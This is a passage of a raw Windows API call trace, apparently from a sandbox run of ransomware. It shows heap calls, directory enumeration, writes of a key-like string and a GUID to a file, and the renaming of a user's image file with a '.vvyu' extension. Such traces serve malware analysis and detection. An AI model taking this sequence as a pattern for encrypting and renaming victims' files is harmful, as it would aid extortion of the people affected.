lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.745] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.746] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.746] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.746] CloseHandle (hObject=0x584) returned 1 [0196.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0196.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0196.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0196.748] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\WXRqwImP8omimb.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\wxrqwimp8omimb.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\WXRqwImP8omimb.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\wxrqwimp8omimb.bmp.vvyu")) returned 1 [0196.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.750] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0196.753] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x586960b0, ftCreationTime.dwHighDateTime=0x1d89e46, ftLastAccessTime.dwLowDateTime=0xb6c638c0, ftLastAccessTime.dwHighDateTime=0x1d8a4a6, ftLastWriteTime.dwLowDateTime=0xb6c638c0, ftLastWriteTime.dwHighDateTime=0x1d8a4a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dSq", cAlternateFileName="")) returned 1 [0196.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bb90 [0196.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0196.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31bc18 [0196.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31bb08 | out: hHeap=0x2c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0196.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0196.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.755] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x586960b0, ftCreationTime.dwHighDateTime=0x1d89e46, ftLastAccessTime.dwLowDateTime=0xb6c638c0, ftLastAccessTime.dwHighDateTime=0x1d8a4a6, ftLastWriteTime.dwLowDateTime=0xb6c638c0, ftLastWriteTime.dwHighDateTime=0x1d8a4a6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dSq", cAlternateFileName="")) returned 0 [0196.755] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0196.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0196.756] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0196.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.756] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0196.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.765] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.780] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.780] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.783] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.783] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b640 | out: hHeap=0x2c0000) returned 1 [0196.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b640 [0196.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.792] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.792] HeapFree (in: hHeap=0x2c0000, 